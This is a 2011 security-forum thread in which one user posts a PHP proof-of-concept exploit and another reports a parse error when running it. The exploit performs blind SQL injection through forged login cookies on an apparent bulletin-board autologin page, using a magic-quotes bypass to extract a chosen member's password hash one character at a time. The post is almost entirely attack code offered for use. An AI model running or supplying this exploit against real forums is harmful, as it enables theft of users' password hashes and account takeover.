|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 123
Members: 0
Total: 123
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Exploit // Proof of Concept |
|
Posted: Tue May 03, 2011 9:09 am |
|
|
Its |
Advanced user |
|
|
Joined: Apr 13, 2011 |
Posts: 122 |
Location: In someoneĀ“s ♥ |
|
|
|
|
|
|
U need to install php~curel...
<?php
/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/
$server = \"SERVER\";
$port = 80;
$file = \"PATH\";
$target = 81;
/* User id and password used to fake-logon are not important. \'10\' is a
random number. */
$id = 10;
$pass = \"\";
$hex = \"0123456789abcdef\";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.This is translated to \' by urldecode. */
$cookie =\"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target\";
$cookie .=\"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527\" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password=\'$pass\' ORid=$target
HAVING id=$target AND MID(`password`,$i,1)=\'$letter\' */
$header = getHeader($server, $port, $file . \"index.php?act=Login&CODE=autologin\", $cookie);
if( !preg_match(\'/Location:(.*)act\\=Login\\&CODE\\=00\\r\\n/\', $header) ) {
echo $i . \": \" . $letter . \"\\n\";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo \"\\n\\nFinal Hash: $hash\\n\";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return \"Unknown\";
} else {
$com = \"HEAD $file HTTP/1.1\\r\\n\";
$com .= \"Host: $server:$port\\r\\n\";
$com .= \"Cookie: $cookie\\r\\n\";
$com .= \"Connection: close\\r\\n\";
$com .= \"\\r\\n\";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match(\'/\\r\\n\\r\\n$/\',$header) );
}
return $header;
}
?> |
|
|
|
|
|
|
RE: Exploit // Proof of Concept |
|
Posted: Tue Nov 15, 2011 9:19 am |
|
|
legenda_7440 |
Beginner |
|
|
Joined: Nov 14, 2011 |
Posts: 3 |
|
|
|
|
|
|
|
I just got this error while run..please help.
PHP Parse error: syntax error, unexpected '"', expecting T_STRING in C:\Scanner\exploit-proof_concept.php on lin
Parse error: syntax error, unexpected '"', expecting T_STRING in C:\Scanner\exploit-proof_concept.php on line 8
thanx.. |
|
|
|
|
www.waraxe.us Forum Index -> Metasploit related
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|